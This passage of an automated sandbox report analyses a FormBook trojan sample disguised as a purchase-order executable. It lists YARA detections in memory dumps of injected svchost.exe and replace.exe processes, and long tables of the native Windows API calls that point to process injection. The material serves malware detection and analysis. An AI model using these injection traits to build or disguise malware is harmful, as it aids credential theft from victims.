            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003BC473 NtClose,2_2_003BC473
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B60 NtClose,LdrInitializeThunk,2_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,2_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274340 NtSetContextThread,2_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274650 NtSuspendThread,2_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BA0 NtEnumerateValueKey,2_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B80 NtQueryInformationFile,2_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BE0 NtQueryValueKey,2_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BF0 NtAllocateVirtualMemory,2_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AB0 NtWaitForSingleObject,2_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AF0 NtWriteFile,2_2_03272AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AD0 NtReadFile,2_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F30 NtCreateSection,2_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F60 NtCreateProcessEx,2_2_03272F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FA0 NtQuerySection,2_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FB0 NtResumeThread,2_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F90 NtProtectVirtualMemory,2_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FE0 NtCreateFile,2_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E30 NtWriteVirtualMemory,2_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EA0 NtAdjustPrivilegesToken,2_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E80 NtReadVirtualMemory,2_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EE0 NtQueueApcThread,2_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D30 NtUnmapViewOfSection,2_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D00 NtSetInformationFile,2_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtMapViewOfSection,2_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DB0 NtEnumerateKey,2_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DD0 NtDelayExecution,2_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C00 NtQueryInformationProcess,2_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C60 NtCreateKey,2_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CA0 NtQueryInformationToken,2_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtOpenProcess,2_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CC0 NtQueryVirtualMemory,2_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273010 NtOpenDirectoryObject,2_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273090 NtSetValueKey,2_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032739B0 NtGetContextThread,2_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D10 NtOpenProcessToken,2_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D70 NtOpenThread,2_2_03273D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF4340 NtSetContextThread,LdrInitializeThunk,4_2_03AF4340
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF4650 NtSuspendThread,LdrInitializeThunk,4_2_03AF4650
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03AF2BA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03AF2BE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03AF2BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2B60 NtClose,LdrInitializeThunk,4_2_03AF2B60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2AF0 NtWriteFile,LdrInitializeThunk,4_2_03AF2AF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2AD0 NtReadFile,LdrInitializeThunk,4_2_03AF2AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2FB0 NtResumeThread,LdrInitializeThunk,4_2_03AF2FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2FE0 NtCreateFile,LdrInitializeThunk,4_2_03AF2FE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2F30 NtCreateSection,LdrInitializeThunk,4_2_03AF2F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03AF2E80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03AF2EE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03AF2DF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2DD0 NtDelayExecution,LdrInitializeThunk,4_2_03AF2DD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03AF2D30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03AF2D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03AF2CA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2C60 NtCreateKey,LdrInitializeThunk,4_2_03AF2C60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03AF2C70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF35C0 NtCreateMutant,LdrInitializeThunk,4_2_03AF35C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF39B0 NtGetContextThread,LdrInitializeThunk,4_2_03AF39B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2B80 NtQueryInformationFile,4_2_03AF2B80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2AB0 NtWaitForSingleObject,4_2_03AF2AB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2FA0 NtQuerySection,4_2_03AF2FA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2F90 NtProtectVirtualMemory,4_2_03AF2F90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2F60 NtCreateProcessEx,4_2_03AF2F60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2EA0 NtAdjustPrivilegesToken,4_2_03AF2EA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2E30 NtWriteVirtualMemory,4_2_03AF2E30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2DB0 NtEnumerateKey,4_2_03AF2DB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2D00 NtSetInformationFile,4_2_03AF2D00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2CF0 NtOpenProcess,4_2_03AF2CF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2CC0 NtQueryVirtualMemory,4_2_03AF2CC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF2C00 NtQueryInformationProcess,4_2_03AF2C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF3090 NtSetValueKey,4_2_03AF3090
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF3010 NtOpenDirectoryObject,4_2_03AF3010
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF3D10 NtOpenProcessToken,4_2_03AF3D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03AF3D70 NtOpenThread,4_2_03AF3D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03248F30 NtDeleteFile,4_2_03248F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03248FD0 NtClose,4_2_03248FD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03248E40 NtReadFile,4_2_03248E40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03248CE0 NtCreateFile,4_2_03248CE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03249120 NtAllocateVirtualMemory,4_2_03249120
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0387F97A NtSetContextThread,4_2_0387F97A
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\PO2024033194.exeCode function: 0_2_041667000_2_04166700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A84532_2_003A8453
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003929202_2_00392920
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003932002_2_00393200
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003912402_2_00391240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003BEAE32_2_003BEAE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003924102_2_00392410
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039FCB32_2_0039FCB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039FCAA2_2_0039FCAA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003945C42_2_003945C4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A66332_2_003A6633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003A662E2_2_003A662E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_003926102_2_00392610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039FED32_2_0039FED3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0039DF532_2_0039DF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA3522_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F02_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033003E62_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E02742_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C02C02_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032301002_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA1182_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C81582_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033001AA2_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F81CC2_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D20002_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032407702_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032647502_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C02_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C6E02_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032405352_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033005912_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E44202_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F24462_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EE4F62_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB402_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F6BD72_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA802_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032569622_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A02_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330A9A62_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324A8402_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032428402_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032268B82_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E8F02_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03282F282_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260F302_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E2F302_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4F402_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BEFA02_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324CFE02_2_0324CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232FC82_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEE262_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240E592_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252E902_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FCE932_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEEDB2_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324AD002_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DCD1F2_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03258DBF2_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323ADE02_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240C002_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0CB52_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230CF22_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F132D2_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D34C2_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328739A2_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A02_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED2_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C02_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327516C2_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F1722_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B16B2_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B1B02_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F70E92_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF0E02_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF0CC2_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C02_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF7B02_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F16CC2_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F75712_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD5B02_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF43F2_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032314602_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFB762_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FB802_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B5BF02_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327DBF92_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B3A6C2_2_032B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFA492_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7A462_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DDAAC2_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03285AA02_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E1AA32_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EDAC62_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D59102_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032499502_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B9502_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD8002_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032438E02_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFF092_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFFB12_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241F922_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03249EB02_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7D732_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243D402_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F1D5A2_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FDC02_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B9C322_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFCF22_2_032FFCF2
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_0820A87F3_2_0820A87F
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081F41EF3_2_081F41EF
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081EBA4F3_2_081EBA4F
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081EBA463_2_081EBA46
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081F0B2F3_2_081F0B2F
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081E03603_2_081E0360
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081F23CF3_2_081F23CF
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081F23CA3_2_081F23CA
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081EBC6F3_2_081EBC6F
            Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exeCode function: 3_2_081E9CEF3_2_081E9CEF
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03ACE3F04_2_03ACE3F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B803E64_2_03B803E6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B7A3524_2_03B7A352
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B402C04_2_03B402C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_03B602744_2_03B60274
